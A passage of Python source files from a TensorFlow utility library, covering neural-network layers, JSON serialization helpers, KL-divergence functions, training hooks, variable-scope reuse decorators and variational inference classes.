return output
@add_arg_scope
@add_variable_scope
def deconv2d(inputs,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
channels_last=False,
use_bias=True,
activation_fn=None,
normalizer_fn=None,
kernel_initializer=None,
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None):
output = tf.layers.conv2d_transpose(
inputs=inputs,
filters=filters,
kernel_size=validate_strides_or_kernel_size('kernel_size', kernel_size),
strides=validate_strides_or_kernel_size('strides', strides),
padding=padding,
data_format='channels_last' if channels_last else 'channels_first',
use_bias=use_bias and (normalizer_fn is None),
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
trainable=trainable,
name='activation'
)
if normalizer_fn is not None:
output = normalizer_fn(output)
if activation_fn is not None:
output = activation_fn(output)
return output
@add_arg_scope
def batch_norm_2d(inputs,
channels_last=False,
momentum=0.99,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer=tf.zeros_initializer(),
gamma_initializer=tf.ones_initializer(),
moving_mean_initializer=tf.zeros_initializer(),
moving_variance_initializer=tf.ones_initializer(),
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
training=False,
trainable=True,
name=None):
return tf.layers.batch_normalization(
inputs=inputs,
axis=-1 if channels_last else 1,
momentum=momentum,
epsilon=epsilon,
center=center,
scale=scale,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer,
moving_mean_initializer=moving_mean_initializer,
moving_variance_initializer=moving_variance_initializer,
beta_regularizer=beta_regularizer,
gamma_regularizer=gamma_regularizer,
beta_constraint=beta_constraint,
gamma_constraint=gamma_constraint,
trainable=trainable,
training=training,
name=name
)
```
#### File: examples/utils/jsonutils.py
```python
import json
from base64 import b64encode, b64decode
from datetime import datetime
import numpy as np
import six
__all__ = [
'JsonBinary', 'JsonEncoder', 'JsonDecoder',
]
class JsonBinary(object):
"""
Wrapper class for binary objects.
In Python2, ordinary strings are binary strings, thus we cannot encode
the binary strings into base64 strings directly. In this case, one
may explicitly wrap such a binary string in this class to inform the
encoder.
Args:
value (bytes): The wrapped binary object.
"""
def __init__(self, value):
if not isinstance(value, six.binary_type):
raise TypeError('`value` is not a binary object.')
self.value = value
def __repr__(self):
return 'JsonBinary(%r)' % (self.value,)
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return isinstance(other, JsonBinary) and self.value == other.value
def __ne__(self, other):
return isinstance(other, JsonBinary) and self.value != other.value
def __lt__(self, other):
return isinstance(other, JsonBinary) and self.value < other.value
def __le__(self, other):
return isinstance(other, JsonBinary) and self.value <= other.value
def __gt__(self, other):
return isinstance(other, JsonBinary) and self.value > other.value
def __ge__(self, other):
return isinstance(other, JsonBinary) and self.value >= other.value
class JsonEncoder(json.JSONEncoder):
"""
Extended JSON encoder with support of the following types:
* bytes | JsonBinary ->
{'__type__': 'binary', 'data': base64 encoded}
* numpy.ndarray ->
{'__type__': 'ndarray', 'data': o.tolist(), 'dtype': o.dtype}
Besides, if the same (customized) object is referenced for multiple
times, and if `object_ref` is set to True, it will only be serialized
only at its first occurrence. All later occurrences will be saved as:
{'__type__': 'ObjectRef', 'id': ...}.
Args:
object_ref (bool): Whether or not to allow serializing same object as
references? (default :obj:`True`)
"""
NO_REF_TYPES = six.integer_types + (float, bool, datetime,)
def __init__(self, object_ref=True, **kwargs):
super(JsonEncoder, self).__init__(**kwargs)
self.object_ref = object_ref
self._ref_dict = {}
def _default_object_handler(self, o):
if isinstance(o, JsonBinary):
cnt = b64encode(o.value).decode('utf-8')
yield {'__type__': 'binary', 'data': cnt}
elif isinstance(o, (np.integer, np.int, np.uint,
np.int8, np.int16, np.int32, np.int64,
np.uint8, np.uint16, np.uint32, np.uint64)):
yield int(o)
elif isinstance(o, (np.float, np.float16, np.float32, np.float64)):
yield float(o)
elif isinstance(o, np.ndarray):
yield {
'__type__': 'ndarray',
'data': o.tolist(),
'dtype': str(o.dtype)
}
#: List of object serialization handlers
OBJECT_HANDLERS = [_default_object_handler]
def clear_object_ref(self):
"""Clear all serialized object references."""
self._ref_dict.clear()
def default(self, o):
o_id = id(o)
if self.object_ref:
if o_id in self._ref_dict:
return {'__type__': 'ObjectRef', '__id__': self._ref_dict[o_id]}
for handler in self.OBJECT_HANDLERS:
for obj in handler(self, o):
if self.object_ref and isinstance(obj, dict) and \
not isinstance(o, self.NO_REF_TYPES):
self._ref_dict[o_id] = len(self._ref_dict)
obj['__id__'] = self._ref_dict[o_id]
return obj
return super(JsonEncoder, self).default(o)
def encode(self, o):
self.clear_object_ref()
return super(JsonEncoder, self).encode(o)
class JsonDecoder(json.JSONDecoder):
"""
Extended JSON decoder coupled with :class:`JsonEncoder`.
Note that a `JsonDecoder` instance is designed to be used for only once.
"""
def __init__(self, **kwargs):
self._object_hook = kwargs.get('object_hook', None)
self._ref_dict = {}
kwargs['object_hook'] = self._injected_object_hook
kwargs.setdefault('object_hook', self._injected_object_hook)
super(JsonDecoder, self).__init__(**kwargs)
def _default_object_handler(self, v):
v_type = v['__type__']
if v_type == 'binary':
yield JsonBinary(b64decode(v['data']))
elif v_type == 'ndarray':
yield np.asarray(v['data'], dtype=v['dtype'])
#: List of object deserialization handlers
OBJECT_HANDLERS = [_default_object_handler]
def _injected_object_hook(self, v):
v_type = v.get('__type__', None)
if v_type == 'ObjectRef':
v_id = v['__id__']
if v_id not in self._ref_dict:
raise KeyError('Object reference %r is not defined.' % (v_id,))
return self._ref_dict[v_id]
elif v_type is not None:
for handler in self.OBJECT_HANDLERS:
for o in handler(self, v):
v_id = v.get('__id__', None)
if v_id is not None:
self._ref_dict[v_id] = o
return o
if self._object_hook is not None:
v = self._object_hook(v)
return v
```
#### File: tfsnippet/mathops/kld.py
```python
from .softmax import log_softmax, softmax
__all__ = ['softmax_logits_kld', 'softmax_probs_kld']
def softmax_logits_kld(ops, p_logits, q_logits, keepdims=False):
"""
Compute the KL-divergence between two softmax categorical distributions
via logits. The last dimension of `p` and `q` are treated as the
softmax dimension, and will be reduced for computing KL-divergence.
.. math::
\\operatorname{D}_{KL}(p(y)\\|q(y)) =
\\sum_y p(y) \\left(\\log p(y) - \\log q(y)\\right)
Args:
ops (npyops or tfops): The math operations module.
p_logits: Logits of softmax categorical :math:`p(y)`.
q_logits: Logits of softmax categorical :math:`q(y)`.
keepdims (bool): Whether or not to keep the reduced dimension?
(default :obj:`False`)
Returns:
The computed softmax categorical distributions KL-divergence.
"""
p_logits = ops.convert_to_tensor(p_logits)
q_logits = ops.convert_to_tensor(q_logits)
with ops.name_scope('softmax_logits_kld', values=[p_logits, q_logits]):
log_p = log_softmax(ops, p_logits)
log_q = log_softmax(ops, q_logits)
p = softmax(ops, p_logits)
# TODO: can we reduce time consumption by ``np.exp(log_p)``?
# p = ops.exp(log_p)
return ops.reduce_sum(p * (log_p - log_q), axis=-1, keepdims=keepdims)
def softmax_probs_kld(ops, p_probs, q_probs, keepdims=False, clip_eps=1e-7):
"""
Compute the KL-divergence between two softmax categorical distributions
via probs. The last dimension of `p` and `q` are treated as the
softmax dimension, and will be reduced for computing KL-divergence.
.. math::
\\operatorname{D}_{KL}(p(y)\\|q(y)) =
\\sum_y p(y) \\left(\\log p(y) - \\log q(y)\\right)
Args:
ops (npyops or tfops): The math operations module.
p_probs: Probabilities of softmax categorical :math:`p(y)`.
q_probs: Probabilities of softmax categorical :math:`q(y)`.
keepdims (bool): Whether or not to keep the reduced dimension?
(default :obj:`False`)
clip_eps: The epsilon value for clipping `p_probs` and `q_probs`,
in order to avoid numerical issues. (default ``1e-7``)
Returns:
The computed softmax categorical distributions KL-divergence.
"""
p_probs = ops.convert_to_tensor(p_probs)
q_probs = ops.convert_to_tensor(q_probs)
with ops.name_scope('softmax_probs_kld', values=[p_probs, q_probs]):
# clip the probabilities to avoid nans
log_p = ops.log(ops.clip_by_value(p_probs, clip_eps, 1. - clip_eps))
log_q = ops.log(ops.clip_by_value(q_probs, clip_eps, 1. - clip_eps))
return ops.reduce_sum(p_probs * (log_p - log_q), axis=-1,
keepdims=keepdims)
```
#### File: modules/container/lambda_.py
```python
from ..base import Module
__all__ = ['Lambda']
class Lambda(Module):
"""
Wrapping arbitrary function into a neural network :class:`Module`.
This class wraps an arbitrary function or lambda expression into
a neural network :class:`Module`, reusing the variables created
within the specified function.
For example, one may wrap :func:`tensorflow.contrib.layers.fully_connected`
into a reusable module with :class:`Lambda` component as follows:
.. code-block:: python
import functools
from tensorflow.contrib import layers
dense = Lambda(
functools.partial(
layers.fully_connected,
num_outputs=100,
activation_fn=tf.nn.relu
)
)
"""
def __init__(self, f, name=None, scope=None):
"""
Construct the :class:`Lambda`.
Args:
f ((inputs, \**kwargs) -> outputs): The function or lambda
expression which derives the outputs.
name (str): Optional name of this module
(argument of :class:`~tfsnippet.utils.VarScopeObject`).
scope (str): Optional scope of this module
(argument of :class:`~tfsnippet.utils.VarScopeObject`).
"""
super(Lambda, self).__init__(name=name, scope=scope)
self._factory = f
def _forward(self, inputs, **kwargs):
return self._factory(inputs, **kwargs)
```
#### File: tfsnippet/trainer/hooks.py
```python
__all__ = [
'HookPriority', 'HookEntry', 'HookList',
]
class HookPriority(object):
"""
Pre-defined hook priorities for :class:`~tfsnippet.trainer.BaseTrainer`
and :class:`~tfsnippet.trainer.Evaluator`.
Smaller values take higher priorities.
"""
EVALUATION = VALIDATION = 500
DEFAULT = 1000
ANNEALING = 1500
LOGGING = 10000
class HookEntry(object):
"""Configurations of a hook entry in :class:`HookList`."""
def __init__(self, callback, freq, priority, birth):
"""
Construct a new :class:`HookEntry`.
Args:
callback (() -> any): The callable object, as the hook callback.
freq (int): The frequency for this callback to be called.
priority (int): The hook priority. Smaller number has higher
priority when the hooks are called.
birth (int): The counter of birth, as an additional key for
sorting the hook entries, such that old hooks will be
placed in front of newly added hooks, if they have the
same priority.
"""
self.callback = callback
self.freq = freq
self.priority = priority
self.counter = freq
self.birth = birth
def reset_counter(self):
"""Reset the `counter` to `freq`, its initial value."""
self.counter = self.freq
def maybe_call(self):
"""
Decrease the `counter`, and call the `callback` if `counter` is less
than 1. The counter will be reset to `freq` after then.
"""
self.counter -= 1
if self.counter < 1:
# put this statement before calling the callback, such that
# the remaining counter would be correctly updated even if
# any error occurs
self.counter = self.freq
self.callback()
def sort_key(self):
"""Get the key for sorting this hook entry."""
return self.priority, self.birth
class HookList(object):
"""
Class for managing hooks in :class:`~tfsnippet.trainer.BaseTrainer`
and :class:`~tfsnippet.trainer.Evaluator`.
A hook is a registered callback that the trainers will call at certain
time, during the training process. Apart from the callback method,
each hook has a `freq` and a `priority`.
* The `freq` controls how often the particular hook should be called,
e.g., every 2 epochs.
* The `priority` determines the priority (order) of calling the hooks.
Smaller number corresponds to higher priority.
"""
def __init__(self):
"""Construct a new :class:`HookList`."""
self._hooks = [] # type: list[HookEntry]
self._birth_counter = 0 # to enforce stable ordering
def add_hook(self, callback, freq=1, priority=HookPriority.DEFAULT):
"""
Add a hook into the list.
Args:
callback (() -> any): The callable object, as the hook callback.
freq (int): The frequency for this callback to be called.
priority (int): The hook priority. Smaller number has higher
priority when the hooks are called.
"""
freq = int(freq)
if freq < 1:
raise ValueError('`freq` must be at least 1.')
self._birth_counter += 1
self._hooks.append(HookEntry(
callback=callback, freq=freq, priority=priority,
birth=self._birth_counter
))
self._hooks.sort(key=lambda e: e.sort_key())
def call_hooks(self):
"""
Call all the registered hooks.
If any of the hook raises an error, it will stop the calling chain,
and propagate the error to upper caller.
"""
for e in self._hooks:
e.maybe_call()
def reset(self):
"""Reset the frequency counter of all hooks."""
for e in self._hooks:
e.reset_counter()
def remove(self, callback):
"""
Remove all hooks having the specified `callback`.
Args:
callback: The callback of the hooks to be removed.
Returns:
int: The number of removed hooks.
"""
return self.remove_if(lambda c, f, t: c == callback)
def remove_all(self):
"""
Remove all hooks.
Returns:
int: The number of removed hooks.
"""
pre_count = len(self._hooks)
self._hooks = []
return pre_count
def remove_by_priority(self, priority):
"""
Remove all hooks having the specified `priority`.
Args:
priority (int): The priority of the hooks to be removed.
Returns:
int: The number of removed hooks.
"""
return self.remove_if(lambda c, f, t: t == priority)
def remove_if(self, condition):
"""
Remove all hooks matching the specified `condition`.
Args:
condition ((callback, freq, priority) -> bool): A callable object
to tell whether or not a hook should be removed.
Returns:
int: The number of removed hooks.
"""
pre_count = len(self._hooks)
self._hooks = [
e for e in self._hooks
if not condition(e.callback, e.freq, e.priority)
]
return pre_count - len(self._hooks)
def __repr__(self):
payload = ','.join(
'{!r}:{}'.format(e.callback, e.freq)
for e in self._hooks
)
if payload:
return 'HookList({})'.format(payload)
else:
return 'HookList()'
```
#### File: tfsnippet/utils/concepts.py
```python
__all__ = [
'AutoInitAndCloseable',
'Disposable',
'NoReentrantContext',
'DisposableContext',
]
class AutoInitAndCloseable(object):
"""
Classes with :meth:`init()` to initialize its internal states, and also
:meth:`close()` to destroy these states. The :meth:`init()` method can
be repeatedly called, which will cause initialization only at the first
call. Thus other methods may always call :meth:`init()` at beginning,
which can bring auto-initialization to the class.
A context manager is implemented: :meth:`init()` is explicitly called
when entering the context, while :meth:`destroy()` is called when
exiting the context.
"""
_initialized = False
def _init(self):
"""Override this method to initialize the internal states."""
raise NotImplementedError()
def init(self):
"""Ensure the internal states are initialized."""
if not self._initialized:
self._init()
self._initialized = True
def __enter__(self):
"""Ensure the internal states are initialized."""
self.init()
return self
def _close(self):
"""Override this method to destroy the internal states."""
raise NotImplementedError()
def close(self):
"""Ensure the internal states are destroyed."""
if self._initialized:
try:
self._close()
finally:
self._initialized = False
def __exit__(self, exc_type, exc_val, exc_tb):
"""Cleanup the internal states."""
self.close()
class Disposable(object):
"""
Classes which can only be used once.
"""
_already_used = False
def _check_usage_and_set_used(self):
"""
Check whether the usage flag, ensure the object has not been used,
and then set it to be used.
"""
if self._already_used:
raise RuntimeError('Disposable object cannot be used twice: {!r}.'.
format(self))
self._already_used = True
class NoReentrantContext(object):
"""
Base class for contexts which are not reentrant (i.e., if there is
a context opened by ``__enter__``, and it has not called ``__exit__``,
the ``__enter__`` cannot be called again).
"""
_is_entered = False
def _enter(self):
"""
Enter the context. Subclasses should override this instead of
the true ``__enter__`` method.
"""
raise NotImplementedError()
def _exit(self, exc_type, exc_val, exc_tb):
"""
Exit the context. Subclasses should override this instead of
the true ``__exit__`` method.
"""
raise NotImplementedError()
def _require_entered(self):
"""
Require the context to be entered.
Raises:
RuntimeError: If the context is not entered.
"""
if not self._is_entered:
raise RuntimeError('Context is required be entered: {!r}.'.
format(self))
def __enter__(self):
if self._is_entered:
raise RuntimeError('Context is not reentrant: {!r}.'.
format(self))
ret = self._enter()
self._is_entered = True
return ret
def __exit__(self, exc_type, exc_val, exc_tb):
if self._is_entered:
self._is_entered = False
return self._exit(exc_type, exc_val, exc_tb)
class DisposableContext(NoReentrantContext):
"""
Base class for contexts which can only be entered once.
"""
_has_entered = False
def __enter__(self):
if self._has_entered:
raise RuntimeError(
'A disposable context cannot be entered twice: {!r}.'.
format(self))
ret = super(DisposableContext, self).__enter__()
self._has_entered = True
return ret
```
#### File: tfsnippet/utils/reuse.py
```python
import inspect
import functools
import weakref
from contextlib import contextmanager
import six
import tensorflow as tf
from .scope import reopen_variable_scope, root_variable_scope
__all__ = ['auto_reuse_variables', 'instance_reuse', 'global_reuse']
@contextmanager
def auto_reuse_variables(name_or_scope, reopen_name_scope=False, **kwargs):
"""
Open a variable scope as a context, automatically choosing `reuse` flag.
The `reuse` flag will be set to :obj:`False` if the variable scope is
opened for the first time, and it will be set to :obj:`True` each time
the variable scope is opened again.
Args:
name_or_scope (str or tf.VariableScope): The name of the variable
scope, or the variable scope to open.
reopen_name_scope (bool): Whether or not to re-open the original name
scope of `name_or_scope`? This option takes effect only if
`name_or_scope` is actually an instance of
:class:`tf.VariableScope`.
\**kwargs: Named arguments for opening the variable scope.
Yields:
tf.VariableScope: The opened variable scope.
"""
if not name_or_scope:
raise ValueError('`name_or_scope` cannot be empty. If you want to '
'auto-reuse variables in root variable scope, you '
'should capture the root variable scope instance '
'and call `auto_reuse_variables` on that, instead '
'of calling with an empty name')
if reopen_name_scope:
if not isinstance(name_or_scope, tf.VariableScope):
raise ValueError('`reopen_name_scope` can be set to True '
'only if `name_or_scope` is an instance of '
'`tf.VariableScope`')
def generate_context():
return reopen_variable_scope(name_or_scope, **kwargs)
else:
def generate_context():
return tf.variable_scope(name_or_scope, **kwargs)
with generate_context() as vs:
# check whether or not the variable scope has been initialized
graph = tf.get_default_graph()
if graph not in __auto_reuse_variables_graph_dict:
__auto_reuse_variables_graph_dict[graph] = set([])
initialized_scopes = __auto_reuse_variables_graph_dict[graph]
reuse = vs.name in initialized_scopes
# if `reuse` is True, set the reuse flag
if reuse:
vs.reuse_variables()
yield vs
else:
yield vs
initialized_scopes.add(vs.name)
#: dict to track the initialization state for each variable scope
#: belonging to every living graph.
__auto_reuse_variables_graph_dict = weakref.WeakKeyDictionary()
def instance_reuse(method=None, scope=None):
"""
Decorate an instance method within :func:`auto_reuse_variables` context.
This decorator should be applied to unbound instance methods, and
the instance that owns the methods should have :attr:`variable_scope`
attribute. For example:
.. code-block:: python
class Foo(object):
def __init__(self, name):
with tf.variable_scope(name) as vs:
self.variable_scope = vs
@instance_reuse
def foo(self):
return tf.get_variable('bar', ...)
The above example is then equivalent to the following code:
.. code-block:: python
class Foo(object):
def __init__(self, name):
with tf.variable_scope(name) as vs:
self.variable_scope = vs
def foo(self):
with reopen_variable_scope(self.variable_scope):
with auto_reuse_variables('foo'):
return tf.get_variable('bar', ...)
By default the name of the variable scope should be equal to the name
of the decorated method, and the name scope within the context should
be equal to the variable scope name, plus some suffix to make it unique.
The variable scope name can be set by `scope` argument, for example:
.. code-block:: python
class Foo(object):
@instance_reuse(scope='scope_name')
def foo(self):
return tf.get_variable('bar', ...)
Note that the variable reusing is based on the name of the variable
scope, rather than the method. As a result, two methods with the same
`scope` argument will reuse the same set of variables. For example:
.. code-block:: python
class Foo(object):
@instance_reuse(scope='foo')
def foo_1(self):
return tf.get_variable('bar', ...)
@instance_reuse(scope='foo')
def foo_2(self):
return tf.get_variable('bar', ...)
These two methods will return the same `bar` variable.
Args:
scope (str): The name of the variable scope. If not set, will use the
method name as scope name. This argument must be specified as named
argument.
See Also:
:func:`tfsnippet.utils.global_reuse`
"""
if method is None:
return functools.partial(instance_reuse, scope=scope)
# check whether or not `method` looks like an instance method
if six.PY2:
getargspec = inspect.getargspec
else:
getargspec = inspect.getfullargspec
if inspect.ismethod(method):
raise TypeError('`method` is expected to be unbound instance method')
argspec = getargspec(method)
if not argspec.args or argspec.args[0] != 'self':
raise TypeError('`method` seems not to be an instance method '
'(whose first argument should be `self`)')
# determine the scope name
scope = scope or method.__name__
@six.wraps(method)
def wrapper(*args, **kwargs):
obj = args[0]
variable_scope = obj.variable_scope
if not isinstance(variable_scope, tf.VariableScope):
raise TypeError('`variable_scope` attribute of the instance {!r} '
'is expected to be a `tf.VariableScope`, but got '
'{!r}'.format(obj, variable_scope))
with reopen_variable_scope(variable_scope):
with auto_reuse_variables(scope):
return method(*args, **kwargs)
return wrapper
def global_reuse(method=None, scope=None):
"""
Decorate a function within :func:`auto_reuse_variables` scope globally.
Any function or method applied with this decorator will be called within
a variable scope opened first by :func:`root_variable_scope`, then by
:func:`auto_reuse_variables`. That is to say, the following code:
.. code-block:: python
@global_reuse
def foo():
return tf.get_variable('bar', ...)
bar = foo()
is equivalent to:
.. code-block:: python
with root_variable_scope():
with auto_reuse_variables('foo'):
bar = tf.get_variable('bar', ...)
By default the name of the variable scope should be equal to the name
of the decorated method, and the name scope within the context should
be equal to the variable scope name, plus some suffix to make it unique.
The variable scope name can be set by `scope` argument, for example:
.. code-block:: python
@global_reuse(scope='dense')
def dense_layer(inputs):
w = tf.get_variable('w', ...)
b = tf.get_variable('b', ...)
return tf.matmul(w, inputs) + b
Note that the variable reusing is based on the name of the variable
scope, rather than the function object. As a result, two functions
with the same name, or with the same `scope` argument, will reuse
the same set of variables. For example:
.. code-block:: python
@global_reuse(scope='foo')
def foo_1():
return tf.get_variable('bar', ...)
@global_reuse(scope='foo')
def foo_2():
return tf.get_variable('bar', ...)
These two functions will return the same `bar` variable.
Args:
scope (str): The name of the variable scope. If not set, will use the
function name as scope name. This argument must be specified as
named argument.
See Also:
:func:`tfsnippet.utils.instance_reuse`
"""
if method is None:
return functools.partial(global_reuse, scope=scope)
scope = scope or method.__name__
@six.wraps(method)
def wrapper(*args, **kwargs):
with root_variable_scope():
with auto_reuse_variables(scope):
return method(*args, **kwargs)
return wrapper
```
#### File: tfsnippet/utils/scope.py
```python
from contextlib import contextmanager
import six
import tensorflow as tf
from tensorflow.python.ops import variable_scope as variable_scope_ops
from .doc_inherit import DocInherit
from .misc import camel_to_underscore
__all__ = ['reopen_variable_scope', 'root_variable_scope', 'VarScopeObject']
@contextmanager
def reopen_variable_scope(var_scope, **kwargs):
"""
Reopen the specified `var_scope` and its original name scope.
Unlike :func:`tf.variable_scope`, which does not open the original name
scope even if a stored :class:`tf.VariableScope` instance is specified,
this method opens exactly the same name scope as the original one.
Args:
var_scope (tf.VariableScope): The variable scope instance.
**kwargs: Named arguments for opening the variable scope.
"""
if not isinstance(var_scope, tf.VariableScope):
raise TypeError('`var_scope` must be an instance of `tf.VariableScope`')
old_name_scope = var_scope.original_name_scope
with variable_scope_ops._pure_variable_scope(var_scope, **kwargs) as vs:
name_scope = old_name_scope
if name_scope and not name_scope.endswith('/'):
name_scope += '/' # pragma: no cover
with tf.name_scope(name_scope):
yield vs
@contextmanager
def root_variable_scope(**kwargs):
"""
Open the root variable scope and its name scope.
Args:
**kwargs: Named arguments for opening the root variable scope.
"""
# `tf.variable_scope` does not support opening the root variable scope
# from empty name. It always prepend the name of current variable scope
# to the front of opened variable scope. So we get the current scope,
# and pretend it to be the root scope.
scope = tf.get_variable_scope()
old_name = scope.name
try:
scope._name = ''
with variable_scope_ops._pure_variable_scope('', **kwargs) as vs:
scope._name = old_name
with tf.name_scope(None):
yield vs
finally:
scope._name = old_name
@DocInherit
class VarScopeObject(object):
"""
Base class for object that owns a variable scope.
It is typically used along with :func:`~tfsnippet.utils.instance_reuse`.
"""
def __init__(self, name=None, scope=None):
"""
Construct the :class:`VarScopeObject`.
Args:
name (str): Name of this object. A unique variable scope name
would be picked up according to this argument, if `scope` is
not specified. If both this argument and `scope` is not
specified, the underscored class name would be considered as
`name`. This argument will be stored and can be accessed via
:attr:`name` attribute of the instance. If not specified,
:attr:`name` would be :obj:`None`.
scope (str): Scope of this object. If specified, it will be used
as the variable scope name, even if another object has already
taken the same scope. That is to say, these two objects will
share the same variable scope.
"""
scope = scope or None
name = name or None
if not scope and not name:
default_name = camel_to_underscore(self.__class__.__name__)
default_name = default_name.lstrip('_')
else:
default_name = name
with tf.variable_scope(scope, default_name=default_name) as vs:
self._variable_scope = vs # type: tf.VariableScope
self._name = name
def __repr__(self):
return '{}({!r})'.format(
self.__class__.__name__, self.variable_scope.name)
@property
def name(self):
"""Get the name of this object."""
return self._name
@property
def variable_scope(self):
"""Get the variable scope of this object."""
return self._variable_scope
def get_variables_as_dict(self, sub_scope=None,
collection=tf.GraphKeys.GLOBAL_VARIABLES,
strip_sub_scope=True):
"""
Get the variables created inside this :class:`VarScopeObject`.
This method will collect variables from specified `collection`,
which are created in the :attr:`variable_scope` of this object
(or in the `sub_scope` of :attr:`variable_scope`, if `sub_scope`
is not :obj:`None`).
Args:
sub_scope (str): The sub-scope of :attr:`variable_scope`.
collection (str): The collection from which to collect variables.
(default ``tf.GraphKeys.GLOBAL_VARIABLES``).
strip_sub_scope (bool): Whether or not to also strip the common
prefix of `sub_scope`? (default :obj:`True`)
Returns:
dict[str, tf.Variable]: Dict which maps from the relative names of
variables to variable objects. By `relative names` we mean the
full names of variables, without the common prefix of
:attr:`variable_scope` (and `sub_scope` if `strip_sub_scope`
is :obj:`True`).
"""
from tfsnippet.utils.session import get_variables_as_dict
scope_name = self.variable_scope.name
if sub_scope:
sub_scope = sub_scope.strip('/')
if scope_name and not scope_name.endswith('/'):
scope_name += '/'
scope_name += sub_scope
ret = get_variables_as_dict(scope_name, collection)
if not strip_sub_scope and sub_scope:
sub_scope += '/'
ret = {sub_scope + k: v for k, v in six.iteritems(ret)}
return ret
```
#### File: tfsnippet/variational/inference.py
```python
import tensorflow as tf
import zhusuan as zs
from .estimators import *
from .evaluation import *
from .objectives import *
from .utils import _require_multi_samples
__all__ = [
'VariationalInference',
'VariationalLowerBounds',
'VariationalTrainingObjectives',
'VariationalEvaluation'
]
class VariationalInference(object):
"""Class for variational inference."""
def __init__(self, log_joint, latent_log_probs, axis=None):
"""
Construct the :class:`VariationalInference`.
Args:
log_joint (tf.Tensor): The log-joint of model.
latent_log_probs (Iterable[tf.Tensor]): The log-densities
of latent variables from the variational net.
axis: The axis or axes to be considered as the sampling dimensions
of latent variables. The specified axes will be summed up in
the variational lower-bounds or training objectives.
(default :obj:`None`)
"""
self._log_joint = tf.convert_to_tensor(log_joint)
self._latent_log_probs = tuple(tf.convert_to_tensor(t)
for t in latent_log_probs)
self._latent_log_prob = tf.add_n(
self._latent_log_probs, name='latent_log_prob')
self._axis = axis
self._lower_bound = VariationalLowerBounds(self)
self._training = VariationalTrainingObjectives(self)
self._evaluation = VariationalEvaluation(self)
@property
def log_joint(self):
"""
Get the log-joint of the model.
Returns:
tf.Tensor: The log-joint of the model.
"""
return self._log_joint
@property
def latent_log_probs(self):
"""
Get the log-densities of latent variables.
Returns:
tuple[tf.Tensor]: The log-densities of latent variables.
"""
return self._latent_log_probs
@property
def latent_log_prob(self):
"""
Get the summed log-density of latent variables.
Returns:
tf.Tensor: The summed log-density of latent variables.
"""
return self._latent_log_prob
@property
def axis(self):
"""
Get the axis or axes to be considered as the sampling dimensions
of latent variables.
"""
return self._axis
def zs_objective(self, func, **kwargs):
"""
Create a :class:`zhusuan.variational.VariationalObjective` with
pre-computed log-joint, by specified algorithm.
Args:
func: The variational algorithm from ZhuSuan. Supported
functions are: 1. :func:`zhusuan.variational.elbo`
2. :func:`zhusuan.variational.importance_weighted_objective`
3. :func:`zhusuan.variational.klpq`
\**kwargs: Named arguments passed to `func`.
Returns:
zhusuan.variational.VariationalObjective: The constructed
per-data variational objective.
"""
return func(
log_joint=lambda observed: self._log_joint,
observed={},
latent={i: (None, log_prob)
for i, log_prob in enumerate(self._latent_log_probs)},
axis=self._axis,
**kwargs
)
def zs_elbo(self):
"""
Create a :class:`zhusuan.variational.EvidenceLowerBoundObjective`,
with pre-computed log-joint.
Returns:
zhusuan.variational.EvidenceLowerBoundObjective: The constructed
per-data ELBO objective.
"""
return self.zs_objective(zs.variational.elbo)
def zs_importance_weighted_objective(self):
"""
Create a :class:`zhusuan.variational.ImportanceWeightedObjective`,
with pre-computed log-joint.
Returns:
zhusuan.variational.ImportanceWeightedObjective: The constructed
per-data importance weighted objective.
"""
return self.zs_objective(zs.variational.importance_weighted_objective)
def zs_klpq(self):
"""
Create a :class:`zhusuan.variational.InclusiveKLObjective`,
with pre-computed log-joint.
Returns:
zhusuan.variational.InclusiveKLObjective: The constructed
per-data inclusive KL objective.
"""
return self.zs_objective(zs.variational.klpq)
@property
def lower_bound(self):
"""
Get the factory for variational lower-bounds.
Returns:
VariationalLowerBounds: The factory for variational lower-bounds.
"""
return self._lower_bound
@property
def training(self):
"""
Get the factory for training objectives.
Returns:
VariationalTrainingObjectives: The factory for training objectives.
"""
return self._training
@property
def evaluation(self):
"""
Get the factory for evaluation outputs.
Returns:
VariationalEvaluation: The factory for evaluation outputs.
"""
return self._evaluation
class VariationalLowerBounds(object):
"""Factory for variational lower-bounds."""
def __init__(self, vi):
"""
Construct a new :class:`VariationalEvaluation`.
Args:
vi (VariationalInference): The variational inference object.
"""
self._vi = vi
def elbo(self, name=None):
"""
Get the evidence lower-bound.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "elbo")
Returns:
tf.Tensor: The evidence lower-bound.
See Also:
:func:`tfsnippet.variational.elbo_objective`
"""
return elbo_objective(
log_joint=self._vi.log_joint,
latent_log_prob=self._vi.latent_log_prob,
axis=self._vi.axis,
name=name or 'elbo'
)
def monte_carlo_objective(self, name=None):
"""
Get the importance weighted lower-bound.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "monte_carlo_objective")
Returns:
tf.Tensor: The per-data importance weighted lower-bound.
See Also:
:func:`tfsnippet.variational.monte_carlo_objective`
"""
_require_multi_samples(self._vi.axis, 'monte carlo objective')
return monte_carlo_objective(
log_joint=self._vi.log_joint,
latent_log_prob=self._vi.latent_log_prob,
axis=self._vi.axis,
name=name or 'monte_carlo_objective'
)
importance_weighted_objective = monte_carlo_objective # Legacy name
class VariationalTrainingObjectives(object):
"""Factory for variational training objectives."""
def __init__(self, vi):
"""
Construct a new :class:`VariationalEvaluation`.
Args:
vi (VariationalInference): The variational inference object.
"""
self._vi = vi
def sgvb(self, name=None):
"""
Get the SGVB training objective.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "sgvb")
Returns:
tf.Tensor: The per-data SGVB training objective.
It is the negative of ELBO, which should directly be minimized.
See Also:
:func:`tfsnippet.variational.sgvb_estimator`
"""
with tf.name_scope(name, default_name='sgvb'):
return -sgvb_estimator(
values=self._vi.log_joint - self._vi.latent_log_prob,
axis=self._vi.axis
)
def reinforce(self, variance_reduction=True, baseline=None, decay=0.8,
name=None):
"""
Get the REINFORCE training objective.
Args:
variance_reduction (bool): Whether to use variance reduction.
